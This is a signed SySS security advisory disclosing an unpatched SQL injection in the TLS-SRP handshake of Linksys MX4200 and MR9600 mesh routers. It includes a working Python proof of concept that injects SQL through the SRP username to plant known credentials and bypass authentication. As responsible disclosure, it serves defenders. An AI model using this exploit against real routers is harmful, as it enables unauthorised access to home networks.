-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-009 Product: MR9600, MX4200 (and potentially others) Manufacturer: Linksys Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 (and potentially others) Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Open Manufacturer Notification: 2025-03-18 Solution Date: - Public Disclosure: 2026-02-12 CVE Reference: CVE-2026-27847 Author of Advisory: Christian Zäske, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Linksys MX4200 is a Wi-Fi mesh router targeting home users. The manufacturer describes the product as follows (see [1]): "This router supports the latest Wi-Fi® 6 (802.11ax) standard for next-level streaming and gaming. Its powerful WiFi 6 mesh coverage offers faster WiFi performance for lag-free online gaming and simultaneous streaming to every device and corner of your home." Due to improper neutralization of special elements, SQL statements can be injected via the handshake of a TLS-SRP connection. This can be used to inject known credentials into the database. These credentials can be utilized to successfully complete the handshake and use the protected service. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Linksys MX4200 (and other models) provides a service (sct_server binary) running on TCP port 6060 (all interfaces except WAN), which is used to integrate other mesh devices into the network. The service accepts TLS-SRP connections with a username and password. The service uses a different script (smcdb_auth) to receive credential information from an SQLite databse using the given username. Since the service does not properly neutralize special elements in the username, arbitrary SQL statements can be injected. This can be used to insert known credentials into the correct database table, which then provide access to the protected service (sct_server). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using the "tlslite-ng" library, the following Python code will inject known credentials into the "authorize" table of the used SQLite database. These credentials can be used to access the service. from socket import * from tlslite.api import * from tlslite import * N, g, salt, verifier = VerifierDB.makeVerifier("SySS", "SySS", 1024) verifier_bytes = verifier.to_bytes(128) sock = socket.socket(AF_INET, SOCK_STREAM) sock.connect(("192.168.1.1", 6060)) conn = TLSConnection(sock) try: conn.handshakeClientSRP(f"\"a\n'; INSERT INTO authorize VALUES ('999', '999', 'SySS', 'SySS', '{salt.hex().upper()}', '');--\"", "dummypass") except: pass for byte in verifier_bytes: sock = socket.socket(AF_INET, SOCK_STREAM) sock.connect(("192.168.1.1", 6060)) conn = TLSConnection(sock) try: conn.handshakeClientSRP(f"\"a\n'; UPDATE authorize SET verifier = verifier || '{byte.to_bytes(1).hex().upper()}' where id = 999;--\"", "dummypass") except: pass After the code is executed, the TLS-SRP handshake will successfully complete when authenticating with the username "SySS" and the password "SySS". ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: There is no known solution yet. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-01-30: Vulnerability discovered 2025-03-18: Vulnerability reported to manufacturer 2025-04-07: First response from manufacturer 2025-04-14: Requested an update from manufacturer 2025-05-06: Acknowledgment of vulnerabilities by the manufacturer 2026-02-12: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Linksys MX4200 https://support.linksys.com/kb/article/952-en/ [2] SySS Security Advisory SYSS-2025-009 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-009.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Zäske of SySS GmbH. E-Mail: christian.zaeske@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc Key ID: 0x7B00D164A32F9AC9 Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEUdRumzwpc0esAQ9aewDRZKMvmskFAmmezDMACgkQewDRZKMv msllNg/+KxZqVaqz1/lpZuNBjvuA90L3/aSjgtLa/DX6I0vp0DUnLYYG/XPVmaKO PLt4TNO6bK1SQ9cs4uBerX3KzbS71EUHMPDjRZnZfu8kRVqPHG/OzAL4BAPrdHKd U4+5Qb6AlkedKLpGVFVpxIsFai3ORENI+yhYi/gHex3FIK9ltsgBnSw9/nWTjgI9 Kl9Qsy57vBpsnBmJm8VLVoVPrXpZkbbCpdIzxSfPnii4z2UoLjY7ZAwe0aSR/bio sNibWcUAU+ZwNtBxYg3cEOjSg66eTcA7GNKDeuwCQdlkenSL8yYcKIMUOoScBXOA 0/B+kJoq0BHPPr7rEkBKHQQVKAxU8His19kZtBsSzNuFrOY1cKnveFr0dfsJrvLf tgBh5hh5DkaQYiMUqI5dAc2r0LTeL8b2TmFz+EB9zPrAOkU/x+SYxmkwqxEaVTDP df1c9OB0mobDVRyPGVhe7jZH4CGYm4KFnHp5H5IOOXZfHEH5vKLht94771fI9x83 Bcgadb95MExUB8FsqZOD+YQGXs2lO+akg2Ll/kcwBjUzgTFP/qw1L1pzmccHUMai snSsUZ8M8wOM/+fakru6smd3b550uOOeu6BLFWaf+YwOhYkCFnJDJJWDRgWfF2Nw 6fKfHvMNpFYomPszNgUUyfjkcKPQztN1a36OnW1EjMcplpbsmKg= =HDZ1 -----END PGP SIGNATURE-----